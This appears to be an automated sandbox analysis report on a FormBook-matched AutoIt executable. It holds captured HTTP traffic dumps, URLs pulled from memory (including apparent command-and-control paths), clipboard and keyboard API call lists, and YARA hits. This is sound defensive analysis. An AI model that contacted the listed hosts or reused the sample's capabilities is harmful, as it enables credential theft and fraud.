82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:52:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DvPRlmBgPLEM4X05GOPeXmJB528UUzPlLeXzsHcQO57w%2B3eCLGrmGuCt6iOy3jR8UWrqpVtBCJVtekibX93SMeQAK3RDFPkXRw0m6GoBpBCjSRPdlh6eioCrh6FcvO%2B2CCVg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f02850f6da41a03-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1889&min_rtt=1889&rtt_var=944&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10905&delivery_rate=0&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:52:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OzjY4Tgh6Iiw4Ubvvj%2BFPmFos4pA4IaVciSoI%2Fk2GRhTUc1%2Fa%2FeAw7FM83gPTd5npYeQ7dxHlHleRJ8v5Jna0v%2FaFMtxC69Wob1a6YiW4SkSe2ERVQZx%2FWfYnMFuckHVmx0x"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f02851ffbec7d0c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1876&min_rtt=1876&rtt_var=938&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 115<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>10
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:52:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:52:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:52:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:52:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)
Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)
Source: ROUTE.EXE, 00000006.00000002.3492415210.000000000406C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000031EC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.epayassist.net/px.js?ch=1
Source: ROUTE.EXE, 00000006.00000002.3492415210.000000000406C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000031EC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.epayassist.net/px.js?ch=2
Source: ROUTE.EXE, 00000006.00000002.3492415210.000000000406C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000031EC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.epayassist.net/sk-logabpstatus.php?a=a1l6S1drb3FtcGMvdlFHNDVXelp6VFg3bWdKdW1EME1NODd3V1Zs
Source: mcPAaApkdo.exe, 00000007.00000002.3491386703.0000000000904000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.erexolsk.shop
Source: mcPAaApkdo.exe, 00000007.00000002.3491386703.0000000000904000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.erexolsk.shop/jh0k/
Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000031EC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://dts.gnpge.com
Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72
Source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: ROUTE.EXE, 00000006.00000003.2324480492.0000000007B5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000004522000.00000004.10000000.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000036A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.erexolsk.shop/jh0k/?gnlxDxt=cE
Source: ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/cloudhost/
Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/jiaoyi/
Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/services/domain/
Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/services/mail/
Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/services/webhosting/
Source: ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/ykj/view.asp?domain=313333.xyz

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CD4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00CD4164

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CD4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00CD4164

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CD3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00CD3F66

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CC001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00CC001C

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CECABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00CECABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3491828564.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3491386703.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2149646425.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3491887739.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2142478185.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2150676929.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3490916220.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3491866393.0000000003530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\CJE003889.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00C63B3A
Source: CJE003889.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: CJE003889.exe, 00000000.00000000.1646179003.0000000000D14000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6057be2d-e
Source: CJE003889.exe, 00000000.00000000.1646179003.0000000000D14000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_03b93faf-8
Source: CJE003889.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_108d42de-b
Source: CJE003889.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_0e5ea996-0

Source: C:\Windows\SysWOW64\svchost.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042CBE3 NtClose,	1_2_0042CBE3
